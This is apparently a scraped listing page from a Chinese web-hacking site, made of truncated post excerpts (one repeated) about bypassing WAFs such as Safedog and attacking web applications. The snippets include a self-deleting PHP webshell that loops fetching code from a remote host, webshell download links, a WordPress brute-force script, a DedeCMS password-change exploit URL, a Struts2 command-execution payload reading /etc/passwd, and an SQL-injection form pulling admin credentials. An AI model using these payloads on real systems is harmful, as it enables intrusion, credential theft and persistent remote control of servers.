轻松绕各种WAF的POST注入、跨站防御(比如安全狗)
XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。 构建如下HTML表单: <!DOCTYPE html> &l...
XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。 构建如下HTML表单: <!DOCTYPE html> &l...
Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。下载版本为15天免费的,该工具支持数据库类型都是国内外主流使用的数据库类型,包括: Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, Mysql,...
webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file...
概要 当用户试图通过 HTTP 或文件传输协议 (FTP) 访问一台正在运行 Internet 信息服务 (IIS) 的服务器上的内容时,IIS 返回一个表示该请求的状态的数字代码。该状态代码记录在 IIS 日志中,同时也可能在 Web 浏览器或 FTP 客户端显示。状态代码可以指明具体请求是否已成功,还可以揭示请求失败的确切原因。 回到顶端 更多信息 日志文件的位置 在默认状态下,...
ASPSPY:http://www.rootkit.net.cn/article.asp?id=132<已关闭> 下载:ASPXspy2 JSPSPY:http://www.forjj.com/?action=show&id=138 <已关闭> 下载:jspspy PHPSPY:http://www.4ngel.net/project/phpspy.htm 下载:p...
在做渗透测试的时候,有时候会遇到一个wordpress博客, 如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。 大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢, 下次发包还是调用命令结合hydra来爆破。 原理是通过URL /?author= 遍历获取用户名, 然后先跑用户名与密码相同的用户, 再调用同目录下pass.txt中的密码文件进行爆破。...
修改密码: /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=1...
之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。 用户密码 admin:d03a7617433c2826976062fec569a434 ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93 那就用之前的admin的密码和hash_code的 放在一...
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: https://www.webshell.cc/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passw...
<form method='post' action='https://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_oper...